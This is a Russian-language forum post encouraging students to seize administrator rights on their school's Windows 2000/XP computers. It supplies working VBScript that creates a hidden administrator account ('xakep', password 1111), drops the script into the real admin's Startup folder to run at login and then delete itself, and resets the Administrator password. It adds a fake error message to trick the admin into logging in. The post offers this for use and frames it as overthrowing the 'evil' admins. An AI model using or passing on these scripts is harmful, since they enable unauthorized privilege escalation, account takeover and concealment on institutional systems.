Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Прива вам школьники и студенты! Я хочу дать вам несколько полезных советов к началу учебного года. Я более чем уверен, что вас уже достала ваша учетная запись с ограниченными правами на виндах 2k NT или XP и вам хочется больше, намного больше! В вашем учебном заведении наверняка есть злые дядьки, которых называют админами, и только эти негодяи знают пассы на элитные учетные записи. Просто падонки, не правда ли? Мы это исправим, более того, мы их свергнем, а вы будете новым королём с большими привилегиями.
Итак, что нам для этого нужно? Лишь 5-10 минут провести за нужным нам компом, что бы на нём был хотя бы один текстовый редактор и целый запас желания получить админскую учетку. Весь этот способ основан на WSH, лучшего пожалуй средсвта для компьютерного западла в виндах (смотри ][ 36 выпуск!). Ни для кого не секрет, что админы логятся на тачках со своей учетной записью (да часто с таким гордым видом)… От этого и будем плясать. Сначала нам потребуется написать простой скриптик "Действия I (урвать хоть что-нибудь)".
Sub helo(admin, Wait)
Set WshShell=WScript.CreateObject("WScript.Shell")
X=WshShell.Run(admin,Wait)
End Sub
Call helo("C:\windows\system32\net.exe user xakep 1111 /add", True)
\\\ тут мы добавляем юзера xakep c паролем 1111
Call helo("C:\windows\system32\net.exe localgroup Администраторы xakep /add", True)
\\\ тут наш юзер становится настоящим админом !!!
и назовем наше творение admin.vbs.
Да всё это просто замечательно, только прав у нас маловато. А вот прав админчика нам как раз хватит, поскольку ключ реестра HKEY_LOCAL_MACHINE нам не доступен у нас не получится заставить грузится этот скрипт у всех юзеров. А зачем нам лишние заморочки, мы будем делать проще, мы просто откроем путь c:\Documents and Settings\Администратор\Главное меню\Программы\Автозагрузка\ и нежно и аккуратно положим туда наш скрипт. Тут возникает другой вопрос - а вдруг админ его заметит… Не заметит, в конце скрипта добавляем следующее:
Set Killer=CreateObject("Scripting.FileSystemObject")
Killer.DeleteFile(" C:\Documents and Settings\Администратор\ Главное меню\Программы\Автозагрузка\ admin.vbs")
(главное помнить, что админ может использовать не встроенную учетную запись "Администратор", а что-нибудь поудобнее, но я вас уверяю, с правами он себя никогда не обделит). И после того, как админ войдёт в систему под своим аккаунтом все дело будет сделано, а как заставить его это сделать я расскажу в конце. Итак, собственный админский аккаунт у нас уже есть, но что мешает настоящему админу его удалить… Это тоже поправимо, делаем следующее.
Заходим в командную строку и набиваем "net localgroup Администраторы" - смотрим кто же у нас имеет права админить, записываем или запоминаем… Действие II ( прощай админ, не поминай лихом). Пишем примерно такой же скрипт ;
Sub helo(admin, Wait)
Set WshShell=WScript.CreateObject("WScript.Shell")
X=WshShell.Run(admin,Wait)
End Sub
Call helo("C:\windows\system32\net.exe user Администратор 1111 /add", True)
Действие III (админ иди работай)
Теперь как же быть с толстыми и ленивыми админами, которым влом хотя бы раз в неделю проверить комп? Их придётся заставить тащить свою задницу к тачке и логинится адинской записью. Надо так надо… К примеру пусть выскакивает мессага о какой-нибудь злой ошибке (это я полностью украду из их журнала выпуска 36) - тоже небольшой скриптик, который мы поместим в реестре на этот раз:
Hacker = MsgBox("тут вы впишите чтонибудь заумное и страшное например "Explorer.exe не может получить доступ к памяти 0x77e626ba", 20, "System error")
==============================================================
(с) Wilderwind
|
Вопрос про:Повышение привелегий в Windows - 
